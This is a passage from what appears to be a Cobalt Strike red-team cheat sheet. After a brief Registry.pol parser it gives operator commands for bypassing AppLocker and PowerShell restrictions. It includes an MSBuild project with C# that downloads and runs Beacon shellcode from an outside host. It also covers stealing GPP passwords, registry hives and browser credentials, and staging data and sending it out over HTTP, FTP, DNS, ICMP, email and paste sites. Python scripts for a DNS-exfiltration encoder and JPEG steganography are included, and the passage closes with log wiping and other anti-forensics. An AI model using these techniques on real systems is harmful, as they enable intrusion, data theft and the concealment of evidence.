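def decode_data(rtype, data):
    """Raw registry bytes -> Python value."""
    if rtype in (REG_SZ, REG_EXPAND_SZ):
        return data.decode("utf-16-le").rstrip("\x00")
    if rtype == REG_DWORD:
        return struct.unpack("<I", data[:4])[0]
    return data

def build_pol(entries):
    """Serialise (key, value, type, data) tuples into a Registry.pol image."""
    body = b"PReg" + struct.pack("<I", 1)            # signature + version 1
    for key, value, rtype, data in entries:
        raw = encode_data(rtype, data)
        body += LB + _u16z(key) + SC + _u16z(value) + SC + struct.pack("<I", rtype)
        body += SC + struct.pack("<I", len(raw)) + SC + raw + RB
    return body

def _read_u16z(buf, pos):
    """Read a NUL-terminated UTF-16LE string at pos; return (text, offset after the NUL)."""
    end = pos
    while end + 2 <= len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    if end + 2 > len(buf):
        raise ValueError(f"unterminated string at offset {pos}")
    return buf[pos:end].decode("utf-16-le"), end + 2

def parse_pol(buf):
    """Parse a Registry.pol image into a list of {key, value, type, data} dicts."""
    if buf[:4] != b"PReg" or struct.unpack("<I", buf[4:8])[0] != 1:
        raise ValueError("not a version-1 PReg file")
    pos, entries = 8, []
    while pos < len(buf):
        if buf[pos:pos + 2] != LB:
            raise ValueError(f"expected '[' at offset {pos}")
        key, pos = _read_u16z(buf, pos + 2)
        value, pos = _read_u16z(buf, pos + 2)                  # pos was on ';'
        rtype = struct.unpack("<I", buf[pos + 2:pos + 6])[0]   # ';' then type DWORD
        size = struct.unpack("<I", buf[pos + 8:pos + 12])[0]   # ';' then size DWORD
        pos += 14                                              # ';' 4 ';' 4 ';'
        data, pos = buf[pos:pos + size], pos + size
        if buf[pos:pos + 2] != RB:
            raise ValueError(f"expected ']' at offset {pos}")
        pos += 2
        entries.append({"key": key, "value": value,
                        "type": TYPE_NAMES.get(rtype, rtype), "data": decode_data(rtype, data)})
    return entries

def summarise(entries):
    """What an operator reads first: LAPS settings and AppLocker collections with their rules."""
    laps = {e["value"]: e["data"] for e in entries if e["key"].lower() == LAPS_KEY.lower()}
    applocker = {}
    for e in entries:
        if not e["key"].lower().startswith(SRPV2_KEY.lower() + "\\"):
            continue
        parts = e["key"][len(SRPV2_KEY) + 1:].split("\\")      # [collection] or [collection, rule GUID]
        coll = applocker.setdefault(parts[0], {"enforcement": "NotConfigured", "rules": []})
        if len(parts) == 1 and e["value"] == "EnforcementMode":
            coll["enforcement"] = {0: "AuditOnly", 1: "Enabled"}.get(e["data"], e["data"])
        elif len(parts) == 2 and e["value"] == "Value":
            coll["rules"].append(e["data"])                     # rule XML, as Parse-PolFile shows it
    return {"laps": laps, "applocker": applocker}

SAMPLE_ENTRIES = [  # constructed sample: real LAPS/SrpV2 value names, made-up rule GUID and XML
    (LAPS_KEY, "AdmPwdEnabled", REG_DWORD, 1),
    (LAPS_KEY, "PasswordLength", REG_DWORD, 14),
    (LAPS_KEY, "PwdExpirationProtectionEnabled", REG_DWORD, 1),
    (LAPS_KEY, "AdminAccountName", REG_SZ, "LapsAdmin"),
    (SRPV2_KEY + r"\Exe", "EnforcementMode", REG_DWORD, 1),
    (SRPV2_KEY + r"\Exe\11111111-2222-3333-4444-555555555555", "Value", REG_SZ,
     '<FilePathRule Id="11111111-2222-3333-4444-555555555555" Name="Windows folder" '
     'UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions>'
     '<FilePathCondition Path="%WINDIR%\\*"/></Conditions></FilePathRule>'),
    (SRPV2_KEY + r"\Dll", "EnforcementMode", REG_DWORD, 0),
]

def demo():
    """Round-trip the constructed sample through build/parse and summarise it."""
    return summarise(parse_pol(build_pol(SAMPLE_ENTRIES)))

if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))   # real file: summarise(parse_pol(open(path, "rb").read()))
```

On the constructed sample the summary shows a 14-character LAPS password with expiration protection on (so the far-future-expiry trick later in this sheet would fail), an Exe collection in Enabled mode with a %WINDIR% path rule, and a Dll collection in AuditOnly mode, which is exactly the combination that makes the rundll32 and C:\Windows-writable-directory bypasses below worth trying.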
AppLocker Bypass Techniques
Writable Windows Directories
Usage: Find writable locations within allowed paths.
# Find user-writable directories under C:\Windows (the default AppLocker rules allow everything under %WINDIR%; C:\Windows\Tasks and C:\Windows\Tracing are the usual candidates)
beacon> powershell Get-Acl C:\Windows\Tasks | fl
# Note: jump psexec works under default rules because the service binary is uploaded to ADMIN$ (C:\Windows), which those rules whitelist
LOLBAS - MSBuild
Usage: Use MSBuild to execute C# code bypassing AppLocker.
<!-- Save as test.csproj and run with: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\MSBuild.exe test.csproj -->
<!-- Host the Beacon shellcode (e.g. http_x64.xprocess.bin) as beacon.bin via Site Management > Host File -->
<!-- MSBuild.exe is a signed Microsoft binary under C:\Windows, so default AppLocker rules allow it; the inline C# task is compiled and executed inside the MSBuild process -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="MSBuild">
    <MSBuildTest/>
  </Target>
  <UsingTask
    TaskName="MSBuildTest"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using System;
          using System.Net;
          using System.Runtime.InteropServices;
          using Microsoft.Build.Framework;
          using Microsoft.Build.Utilities;

          public class MSBuildTest : Task, ITask
          {
            public override bool Execute()
            {
              // Download the raw shellcode from the team server (BaseAddress + "beacon.bin")
              byte[] shellcode;
              using (var client = new WebClient())
              {
                client.BaseAddress = "http://nickelviper.com";
                shellcode = client.DownloadData("beacon.bin");
              }

              // Resolve VirtualAlloc and CreateThread at runtime through delegates rather than static imports
              var hKernel = LoadLibrary("kernel32.dll");
              var hVa = GetProcAddress(hKernel, "VirtualAlloc");
              var hCt = GetProcAddress(hKernel, "CreateThread");
              var va = Marshal.GetDelegateForFunctionPointer<AllocateVirtualMemory>(hVa);
              var ct = Marshal.GetDelegateForFunctionPointer<CreateThread>(hCt);

              // MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE; copy the shellcode in and run it on a new thread
              var hMemory = va(IntPtr.Zero, (uint)shellcode.Length, 0x00001000 | 0x00002000, 0x40);
              Marshal.Copy(shellcode, 0, hMemory, shellcode.Length);
              var t = ct(IntPtr.Zero, 0, hMemory, IntPtr.Zero, 0, IntPtr.Zero);

              // Block forever so MSBuild stays alive and keeps the Beacon running
              WaitForSingleObject(t, 0xFFFFFFFF);
              return true;
            }

            [DllImport("kernel32", CharSet = CharSet.Ansi)]
            private static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);

            [DllImport("kernel32", CharSet = CharSet.Ansi)]
            private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

            [DllImport("kernel32")]
            private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
            private delegate IntPtr AllocateVirtualMemory(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
            private delegate IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
PowerShell Constrained Language Mode Bypass
Usage: Break out of PowerShell restrictions. powerpick and powershell-import run PowerShell through an unmanaged runspace in a spawned sacrificial process rather than in powershell.exe, so the ConstrainedLanguage mode that AppLocker enforces on powershell.exe does not apply.
# Check current language mode
beacon> powershell $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
# Use powerpick for full language mode
beacon> powerpick $ExecutionContext.SessionState.LanguageMode
FullLanguage
DLL Execution
Usage: Execute Beacon as a DLL through rundll32. AppLocker does not evaluate DLLs unless the DLL rule collection has been explicitly enabled (it is off by default), so a DLL payload often runs where an EXE is blocked.
# Execute the Beacon DLL via rundll32 (run from a command prompt on the target; StartW is the export the Cobalt Strike DLL payloads provide)
C:\Windows\System32\rundll32.exe http_x64.dll,StartW
Data Exfiltration
Network Share Enumeration
Usage: Discover and access network file shares containing sensitive data.
# General share discovery (PowerView; Get-NetFileServer is the older name of Get-DomainFileServer)
beacon> powerpick Invoke-ShareFinder
beacon> powerpick Invoke-FileFinder
beacon> powerpick Get-NetFileServer
# Search for Group Policy Preferences passwords in SYSVOL (cpassword is AES-encrypted with a key Microsoft published, so any domain user can decrypt it)
beacon> shell findstr /S /I cpassword \\dc.organicsecurity.local\sysvol\organicsecurity.local\policies\*.xml
# Find and decrypt them in one go with PowerSploit's Get-GPPPassword (Get-DecryptedCpassword is the helper inside that script)
beacon> powerpick Get-GPPPassword
# Find accessible shares with sensitive files
beacon> powerpick Find-DomainShare -CheckShareAccess
beacon> powerpick Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*
# Preview file contents
beacon> powerpick gc \\fs.dev.cyberbotic.io\finance$\export.csv | select -first 5
Database Data Discovery
Usage: Search for sensitive information in accessible databases.
# Search for sensitive keywords in accessible databases
beacon> powerpick Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "email,address,credit,card" -SampleSize 5 | select instance, database, column, sample | ft -autosize
# Database link enumeration and data extraction
beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select * from information_schema.tables')"
beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select column_name from master.information_schema.columns where table_name=''employees''')"
beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select top 5 first_name,gender,sort_code from master.dbo.employees')"
File System Search Techniques
Usage: Search for sensitive files across the network.
# Search for specific file types
beacon> powerpick Get-ChildItem -Path "\\server\share" -Recurse -Include *.xlsx,*.docx,*.pdf | select FullName,Length,LastWriteTime
# Search file contents for keywords
beacon> powerpick Select-String -Path "\\server\share\*.txt" -Pattern "password|credential|secret" | select Filename,LineNumber,Line
# Search registry for stored credentials
beacon> powerpick Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | select DefaultUserName,DefaultPassword
# Search for files containing sensitive patterns
beacon> powerpick Get-ChildItem -Path "C:\Users" -Recurse -Include *.txt,*.doc*,*.xls* | Select-String -Pattern "password|ssn|social.*security|credit.*card" | select Filename,LineNumber
# Browser artifacts are SQLite/JSON files, so list them and download them for offline parsing rather than reading them with Get-Content (Firefox: logins.json + key4.db hold saved logins, places.sqlite holds history and bookmarks; Chrome: "Login Data" and "History")
beacon> powerpick Get-ChildItem -Path "$env:APPDATA\Mozilla\Firefox\Profiles" -Recurse -Include places.sqlite,logins.json,key4.db | select FullName
beacon> powerpick Get-ChildItem -Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\*" -Include "Login Data","History" | select FullName
Data Staging and Compression
Usage: Prepare data for exfiltration while minimizing detection.
# Create staging directory in system location
beacon> mkdir C:\Windows\Temp\Updates
# Compress data for exfiltration
beacon> powerpick Compress-Archive -Path "\\server\share\sensitive_folder" -DestinationPath "C:\Windows\Temp\Updates\data.zip" -CompressionLevel Optimal
# Alternative compression using 7zip (if available)
beacon> shell "C:\Program Files\7-Zip\7z.exe" a -tzip "C:\Windows\Temp\Updates\archive.zip" "\\server\share\*" -mx9
# WinRAR compression (if available)
beacon> shell "C:\Program Files\WinRAR\rar.exe" a -r -ep1 "C:\Windows\Temp\Updates\data.rar" "\\server\share\*"
# Built-in compression using makecab
beacon> shell makecab "C:\sensitive\file.txt" "C:\Windows\Temp\Updates\file.cab"
# Base64 encode small files for easy transfer
beacon> powerpick [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\sensitive\file.txt")) | Out-File "C:\Windows\Temp\encoded.txt"
# Split large files into 10 MB parts with a streaming read (slicing ReadAllBytes() per chunk re-reads the whole file every time); reassemble on the attacker host with: cat $(ls -v data.zip.part*) > data.zip
beacon> powerpick $in = "C:\Windows\Temp\Updates\data.zip"; $buf = New-Object byte[] 10MB; $fs = [System.IO.File]::OpenRead($in); $i = 0; while (($n = $fs.Read($buf, 0, $buf.Length)) -gt 0) { $i++; $out = [System.IO.File]::OpenWrite("$in.part$i"); $out.Write($buf, 0, $n); $out.Close() }; $fs.Close()
Exfiltration Methods
Usage: Transfer data out of the network using various techniques.
# HTTP POST exfiltration
beacon> powerpick Invoke-WebRequest -Uri "http://exfil-server.com/upload" -Method POST -InFile "C:\Windows\Temp\Updates\data.zip" -Headers @{"User-Agent"="Mozilla/5.0"}
# HTTP PUT exfiltration
beacon> powerpick Invoke-RestMethod -Uri "http://exfil-server.com/put/data.zip" -Method PUT -InFile "C:\Windows\Temp\Updates\data.zip"
# FTP exfiltration
beacon> powerpick $webclient = New-Object System.Net.WebClient; $webclient.Credentials = New-Object System.Net.NetworkCredential("username","password"); $webclient.UploadFile("ftp://ftp.exfil-server.com/data.zip", "C:\Windows\Temp\Updates\data.zip")
# FTPS exfiltration using WinSCP (if available)
beacon> shell "C:\Program Files\WinSCP\WinSCP.exe" /command "open ftps://user:pass@server.com" "put C:\Windows\Temp\Updates\data.zip" "exit"
# DNS exfiltration (small data only): hex-encode so every label is DNS-safe (base64 contains + / = which are not valid hostname characters), keep labels at or under 63 characters, and prefix a sequence label so the receiver can reorder; the queries are read from the logs of the attacker's authoritative name server
beacon> powerpick $hex = ([System.BitConverter]::ToString([System.IO.File]::ReadAllBytes("C:\small_file.txt")) -replace '-').ToLower(); $i = 0; $hex -split '(.{60})' | ? { $_ } | % { nslookup "$i.$_.exfil.domain.com" 2>&1 | Out-Null; $i++ }
# ICMP exfiltration: ping.exe cannot carry an arbitrary payload, but the .NET Ping class can (Send() takes a byte[] buffer, max 65500 bytes), so send the file in small chunks
beacon> powerpick $p = New-Object System.Net.NetworkInformation.Ping; $bytes = [System.IO.File]::ReadAllBytes("C:\small_file.txt"); for ($i = 0; $i -lt $bytes.Length; $i += 1024) { $n = [Math]::Min(1024, $bytes.Length - $i); $chunk = New-Object byte[] $n; [Array]::Copy($bytes, $i, $chunk, 0, $n); $p.Send("exfil-server.com", 1000, $chunk) | Out-Null }
# Email exfiltration
beacon> powerpick Send-MailMessage -From "user@company.com" -To "attacker@external.com" -Subject "Quarterly Report" -Body "Please find attached report" -Attachments "C:\Windows\Temp\Updates\data.zip" -SmtpServer "mail.company.com" -Port 587 -UseSsl
# Cloud storage sync clients: drop the file into a folder the installed client already syncs (Dropbox, Google Drive, OneDrive); note that cmd.exe expands %USERNAME%, not $env:USERNAME
beacon> shell copy "C:\Windows\Temp\Updates\data.zip" "C:\Users\%USERNAME%\Dropbox\data.zip"
beacon> shell copy "C:\Windows\Temp\Updates\data.zip" "C:\Users\%USERNAME%\Google Drive\data.zip"
beacon> shell copy "C:\Windows\Temp\Updates\data.zip" "C:\Users\%USERNAME%\OneDrive\data.zip"
# Pastebin exfiltration for small text data
beacon> powerpick $content = Get-Content "C:\sensitive\passwords.txt" -Raw; Invoke-WebRequest -Uri "https://pastebin.com/api/api_post.php" -Method POST -Body @{api_dev_key="your_key";api_option="paste";api_paste_code=$content}
# GitHub Gist exfiltration
beacon> powerpick $headers = @{Authorization="token your_github_token"}; $body = @{files=@{"data.txt"=@{content=(Get-Content "C:\sensitive\file.txt" -Raw)}}} | ConvertTo-Json -Depth 3; Invoke-WebRequest -Uri "https://api.github.com/gists" -Method POST -Headers $headers -Body $body -ContentType "application/json"
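The DNS one-liner above is what an operator types into the Beacon; the receiving side, and the encoding rules that make the channel reliable, are easier to see in code. This Python script is an added example (not course or Cobalt Strike code): it base32-encodes the payload (every label is then DNS-safe and case-insensitive, and base32 packs 5 bytes into 8 characters versus hex's 2 per byte), splits it into labels of at most 63 characters, gives each query a hex sequence label so the receiver can reorder and detect gaps, and keeps each full name under 253 characters. `decode_queries` is what you would run over the query log of the authoritative name server for the zone. `ZONE` and the sample payload are assumptions made for the demo; the name server itself is not included.

```python
"""DNS exfiltration encoder and decoder (added example, not course or Cobalt Strike code)."""
import base64
import re

MAX_LABEL = 63                                 # RFC 1035 label limit
MAX_NAME = 253                                 # practical full-name limit
DATA_LABEL = re.compile(r"^[a-z2-7]{1,63}$")  # lower-cased base32 alphabet
ZONE = "exfil.domain.com"                      # assumption: a zone whose name server you control


def encode_queries(data, zone=ZONE, labels_per_name=3):
    """Split `data` into query names <seq>.<label>[.<label>...].<zone>; base32 keeps every label DNS-safe."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    per_name = MAX_LABEL * labels_per_name
    names = []
    for seq, start in enumerate(range(0, len(b32), per_name)):
        piece = b32[start:start + per_name]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        name = ".".join([f"{seq:04x}", *labels, zone])   # hex sequence number lets the receiver reorder
        if len(name) > MAX_NAME:
            raise ValueError("name too long; lower labels_per_name")
        names.append(name)
    return names


def decode_queries(names, zone=ZONE):
    """Reassemble the payload from logged query names, in any order, skipping unrelated lookups."""
    suffix = "." + zone
    pieces = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        if len(labels) < 2 or not all(DATA_LABEL.match(l) for l in labels[1:]):
            continue
        try:
            seq = int(labels[0], 16)
        except ValueError:
            continue
        pieces[seq] = "".join(labels[1:])
    if sorted(pieces) != list(range(len(pieces))):       # a dropped query corrupts everything after it
        missing = sorted(set(range(max(pieces) + 1)) - set(pieces))
        raise ValueError(f"missing sequence numbers: {missing}")
    b32 = "".join(pieces[k] for k in sorted(pieces)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))   # restore the padding stripped on send


if __name__ == "__main__":
    sample = b"constructed sample: " + bytes(range(256))    # stands in for C:\small_file.txt
    queries = encode_queries(sample)
    print(len(queries), "queries, e.g.", queries[0])
    print(decode_queries(queries[::-1] + ["www.exfil.domain.com"]) == sample)
```

The same properties that make this work are what a detection engineer keys on: many unique subdomains under one zone, labels near the 63-character limit with high entropy, and a query rate far above normal for the client, so keep payloads small and the rate low if the engagement calls for stealth.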
Steganography and Covert Channels
Usage: Hide data in legitimate-looking files and communications.
# Append data to a JPEG (viewers stop at the end-of-image marker FF D9, so the appended tail is not displayed)
beacon> shell copy /b "C:\legitimate_image.jpg" + "C:\sensitive_data.txt" "C:\Windows\Temp\combined.jpg"
# Extract the appended data: everything after the last FF D9 (findstr cannot do this; assumes the payload itself contains no FF D9)
beacon> powerpick $b = [System.IO.File]::ReadAllBytes("C:\Windows\Temp\combined.jpg"); $i = $b.Length - 2; while ($i -gt 0 -and -not ($b[$i] -eq 0xFF -and $b[$i+1] -eq 0xD9)) { $i-- }; [System.IO.File]::WriteAllBytes("C:\Windows\Temp\extracted.txt", $b[($i+2)..($b.Length-1)])
# Hide data in Word document properties
beacon> powerpick $word = New-Object -ComObject Word.Application; $doc = $word.Documents.Open("C:\document.docx"); $doc.BuiltInDocumentProperties.Item("Comments") = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\sensitive.txt")); $doc.Save(); $word.Quit()
# Covert timing channel: one ping per byte, the delay before it encodes the value (up to 2.55 s per byte, so only for tiny payloads)
beacon> powerpick $data = [System.IO.File]::ReadAllBytes("C:\sensitive.txt"); foreach($byte in $data) { Start-Sleep -Milliseconds ($byte * 10); ping -n 1 exfil-server.com }
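The append-to-JPEG trick above has one weak spot: getting the data back. Searching for the first FF D9 fails on any camera JPEG, because the EXIF APP1 segment carries an embedded thumbnail with its own end-of-image marker, and searching for the last FF D9 fails as soon as the payload contains those two bytes (any binary payload, including another image). This Python script, added here as a worked example rather than course or Cobalt Strike code, walks the JPEG marker structure to find the real EOI, then compares that against the two naive scans. The sample JPEG is a constructed skeleton: structurally valid for the marker walk, not a decodable picture.

```python
"""Covert channel via data appended to a JPEG, with an extractor that finds the real
end-of-image marker by walking the JPEG structure (added example, not course code)."""


def jpeg_end(buf):
    """Offset just past the EOI marker of the JPEG that starts at buf[0]."""
    if buf[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (no SOI)")
    pos = 2
    while pos + 1 < len(buf):
        if buf[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = buf[pos + 1]
        if marker == 0xFF:                       # fill byte; the marker starts at the next 0xFF
            pos += 1
            continue
        if marker == 0xD9:                       # EOI: the one the naive scans mis-identify
            return pos + 2
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:   # standalone markers, no length field
            pos += 2
            continue
        pos += 2 + int.from_bytes(buf[pos + 2:pos + 4], "big")  # skip the segment (length includes itself)
        if marker == 0xDA:                       # SOS: entropy-coded data follows, up to the next real marker
            while pos + 1 < len(buf):
                nxt = buf[pos + 1]
                if buf[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break                        # FF00 is a stuffed byte, FFD0-FFD7 are restart markers
                pos += 1
    raise ValueError("no EOI marker found")


def hide(image, payload):
    """Same as `copy /b image + payload combined.jpg`: viewers stop at EOI and ignore the tail."""
    jpeg_end(image)          # refuse to hide in something that is not a JPEG
    return image + payload


def extract(combined):
    """Everything after the real EOI, i.e. the appended payload."""
    return combined[jpeg_end(combined):]


def extract_first_eoi(combined):
    """Naive: first FF D9, fooled by the EXIF thumbnail's own EOI."""
    return combined[combined.find(b"\xff\xd9") + 2:]


def extract_last_eoi(combined):
    """Naive: last FF D9, fooled when the payload itself contains FF D9."""
    return combined[combined.rfind(b"\xff\xd9") + 2:]


def _seg(marker, payload):
    """Build a JPEG segment: FF marker, 2-byte big-endian length (includes itself), payload."""
    return b"\xff" + bytes([marker]) + (len(payload) + 2).to_bytes(2, "big") + payload


# Constructed JPEG skeleton: SOI, APP1/EXIF carrying an embedded thumb with its own SOS and EOI,
# DQT, SOS with entropy data containing a stuffed FF00 and a restart marker FFD0, then the real EOI.
_THUMB = b"\xff\xd8" + _seg(0xDB, b"\x00" * 5) + _seg(0xDA, b"\x01\x00") + b"\x12\xff\x00\x34" + b"\xff\xd9"
SAMPLE_JPEG = (b"\xff\xd8" + _seg(0xE1, b"Exif\x00\x00" + _THUMB) + _seg(0xDB, b"\x00" * 5)
               + _seg(0xDA, b"\x01\x00") + b"\xab\xff\x00\xcd\xff\xd0\x11\x22" + b"\xff\xd9")


if __name__ == "__main__":
    secret = b"db export row 1\xff\xd9row 2\n"      # payload that happens to contain FF D9
    combined = hide(SAMPLE_JPEG, secret)
    print(extract(combined) == secret, extract_first_eoi(combined) == secret, extract_last_eoi(combined) == secret)
```

On the sample, only `extract` returns the payload; the first-EOI scan returns the thumbnail's tail plus the real image, and the last-EOI scan returns only the bytes after the FF D9 inside the payload. Run this on the attacker host against the downloaded combined.jpg rather than trying to do the marker walk in a Beacon one-liner.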
Living off the Land Exfiltration
Usage: Use legitimate Windows utilities for data exfiltration.
# certutil: -encode base64-encodes a file; -urlcache -f only downloads (GET), so it can pull tooling onto the host but cannot push data out
beacon> shell certutil -encode "C:\sensitive\data.txt" "C:\Windows\Temp\encoded.txt"
beacon> shell certutil -urlcache -split -f "http://exfil-server.com/upload" "C:\Windows\Temp\test.html"
# bitsadmin upload job (BITS uploads need a server that implements the BITS upload protocol, e.g. IIS with the BITS Server Extension); /addfile takes the remote URL first, then the local file
beacon> shell bitsadmin /create /upload exfiljob
beacon> shell bitsadmin /addfile exfiljob "http://exfil-server.com/upload/data.zip" "C:\Windows\Temp\data.zip"
beacon> shell bitsadmin /resume exfiljob
beacon> shell bitsadmin /complete exfiljob
# Using PowerShell WebClient
beacon> powerpick $client = New-Object System.Net.WebClient; $client.UploadFile("http://exfil-server.com/upload.php", "POST", "C:\Windows\Temp\data.zip")
# Using curl (Windows 10 version 1803+)
beacon> shell curl -X POST -F "file=@C:\Windows\Temp\data.zip" http://exfil-server.com/upload
# Using tar (bsdtar, Windows 10 1803+) for compression; use -C to change into the folder, since tar does not expand a quoted "*"
beacon> shell tar -czf "C:\Windows\Temp\archive.tar.gz" -C "C:\sensitive\folder" .
Registry Exfiltration
Usage: Extract sensitive information from Windows registry.
# Save the SAM, SYSTEM and SECURITY hives (reg export cannot read these protected keys even as admin; reg save works for a local admin via the backup privilege and writes hive files that secretsdump or mimikatz can parse offline)
beacon> shell reg save HKLM\SAM "C:\Windows\Temp\sam.save" /y
beacon> shell reg save HKLM\SYSTEM "C:\Windows\Temp\system.save" /y
beacon> shell reg save HKLM\SECURITY "C:\Windows\Temp\security.save" /y
# Export user hives in text .reg format (HKU covers every loaded user hive and gets large)
beacon> shell reg export HKCU "C:\Windows\Temp\user.reg" /y
beacon> shell reg export HKU "C:\Windows\Temp\users.reg" /y
# Search for stored credentials in registry
beacon> powerpick Get-ChildItem -Path "HKLM:\SOFTWARE" -Recurse | Get-ItemProperty | Where-Object {$_.PSObject.Properties.Name -match "password|pwd|credential|secret"}
# Export browser saved passwords from registry
beacon> shell reg export "HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2" "C:\Windows\Temp\ie_passwords.reg" /y
Covering Tracks
Usage: Remove local evidence of data access and exfiltration. Most of these actions leave their own trace (clearing a log writes Security 1102 / System 104, an emptied Prefetch folder or a freshly deleted USN journal is itself anomalous), and anything already forwarded to a SIEM is out of reach.
# Clear PowerShell history
beacon> powerpick Remove-Item (Get-PSReadlineOption).HistorySavePath -Force -ErrorAction SilentlyContinue
beacon> powerpick Clear-History
beacon> powerpick Remove-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Force -ErrorAction SilentlyContinue
# Clear Windows event logs (this writes Security 1102 / System 104, which log forwarding and SIEM rules alert on)
beacon> shell wevtutil cl System
beacon> shell wevtutil cl Security
beacon> shell wevtutil cl Application
beacon> shell wevtutil cl "Microsoft-Windows-PowerShell/Operational"
beacon> shell wevtutil cl "Windows PowerShell"
# Individual records cannot be deleted with wevtutil (there is no delete-log verb); at most you can list which object-access events (4663/4656/4658) were recorded for the files you touched
beacon> powerpick Get-WinEvent -FilterHashtable @{LogName="Security";ID=4663,4656,4658} | Where-Object {$_.Message -like "*sensitive*"} | select TimeCreated,Id,RecordId
# Remove staging files securely (sdelete is a Sysinternals tool and must be uploaded first; -s recurses, -q is quiet; -z zeroes free space and takes a drive letter, not a directory)
beacon> shell sdelete -accepteula -p 3 -s -q "C:\Windows\Temp\Updates"
beacon> rm C:\Windows\Temp\Updates
# Clear prefetch files
beacon> shell del /f /q "C:\Windows\Prefetch\*.pf"
# Reset last-access timestamps (only $STANDARD_INFORMATION changes; the $FILE_NAME timestamps in the MFT keep the original values, so this does not survive a forensic review)
beacon> powerpick Get-ChildItem "\\server\share" -Recurse | ForEach-Object {$_.LastAccessTime = $_.CreationTime}
# Delete the USN change journal (requires admin; NTFS recreates an empty journal, and a journal that starts right after your activity is itself a forensic indicator)
beacon> shell fsutil usn deletejournal /d C:
# Clear browser history and cache
beacon> powerpick Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Force -Recurse -ErrorAction SilentlyContinue
beacon> powerpick Remove-Item -Path "$env:APPDATA\Microsoft\Windows\Recent\*" -Force -ErrorAction SilentlyContinue
beacon> powerpick Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\History\*" -Force -Recurse -ErrorAction SilentlyContinue
# Clear Chrome history (History* also catches the History-journal file)
beacon> powerpick Remove-Item -Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\History*" -Force -ErrorAction SilentlyContinue
# Clear Firefox history
beacon> powerpick Get-ChildItem "$env:APPDATA\Mozilla\Firefox\Profiles\*.default" | ForEach-Object { Remove-Item "$($_.FullName)\places.sqlite" -Force -ErrorAction SilentlyContinue }
# Clear thumbnail cache
beacon> powerpick Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\Explorer\thumbcache*.db" -Force -ErrorAction SilentlyContinue
# Clear Windows Search index
beacon> shell sc stop "WSearch"
beacon> powerpick Remove-Item -Path "C:\ProgramData\Microsoft\Search\Data\*" -Force -Recurse -ErrorAction SilentlyContinue
beacon> shell sc start "WSearch"
# Overwrite slack space (requires admin)
beacon> shell cipher /w:C:\Windows\Temp
# Clear the ARP cache (do not delete routes: "route delete 0.0.0.0" removes the default gateway and kills the Beacon's own connectivity)
beacon> shell netsh interface ip delete arpcache
# Clear DNS cache
beacon> shell ipconfig /flushdns